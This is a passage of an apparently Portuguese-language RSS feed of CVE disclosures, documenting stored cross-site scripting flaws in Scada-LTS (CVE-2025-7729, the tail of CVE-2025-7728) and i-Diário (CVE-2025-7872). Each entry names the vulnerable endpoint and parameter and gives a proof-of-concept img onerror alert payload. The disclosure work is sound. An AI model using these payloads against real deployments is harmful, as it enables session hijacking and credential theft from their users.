class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7728/image.png&amp;#34;
	width=&amp;#34;845&amp;#34;
	height=&amp;#34;719&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7728/image_hu_2812788e7819ccd3.png 480w, /p/cve-2025-7728/image_hu_9abb080d9b9ab836.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;117&amp;#34;
		data-flex-basis=&amp;#34;282px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7728/image-1.png&amp;#34;
	width=&amp;#34;1011&amp;#34;
	height=&amp;#34;549&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7728/image-1_hu_38f8c9818a1d9d3b.png 480w, /p/cve-2025-7728/image-1_hu_5a50be6addac808c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;184&amp;#34;
		data-flex-basis=&amp;#34;441px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7729</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7729/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7729/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7729-cross-site-scripting-xss-armazenado-no-endpoint-usersprofilesshtm-parâmetro-userprofilename&amp;#34;&amp;gt;CVE-2025-7729: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7729-cross-site-scripting-xss-armazenado-no-endpoint-usersprofilesshtm-parâmetro-userprofilename&amp;#34;&amp;gt;CVE-2025-7729: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7729/image.png&amp;#34;
	width=&amp;#34;1013&amp;#34;
	height=&amp;#34;541&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7729/image_hu_e21d105baa8d5ea3.png 480w, /p/cve-2025-7729/image_hu_770ae5c8de58bd9d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7729/image-1.png&amp;#34;
	width=&amp;#34;1011&amp;#34;
	height=&amp;#34;537&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7729/image-1_hu_5d649151d977a0d6.png 480w, /p/cve-2025-7729/image-1_hu_87877a04570b6134.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;188&amp;#34;
		data-flex-basis=&amp;#34;451px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7872</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7872/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7872/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7872-cross-site-scripting-xss-armazenado-no-endpoint-justificativas-de-falta-parâmetro-justificativa&amp;#34;&amp;gt;CVE-2025-7872: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7872-cross-site-scripting-xss-armazenado-no-endpoint-justificativas-de-falta-parâmetro-justificativa&amp;#34;&amp;gt;CVE-2025-7872: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC3&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7872/image.png&amp;#34;
	width=&amp;#34;972&amp;#34;
	height=&amp;#34;892&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7872/image_hu_b4847f334cbf63a8.png 480w, /p/cve-2025-7872/image_hu_711c4335047c53ed.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;108&amp;#34;
		data-flex-basis=&amp;#34;261px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
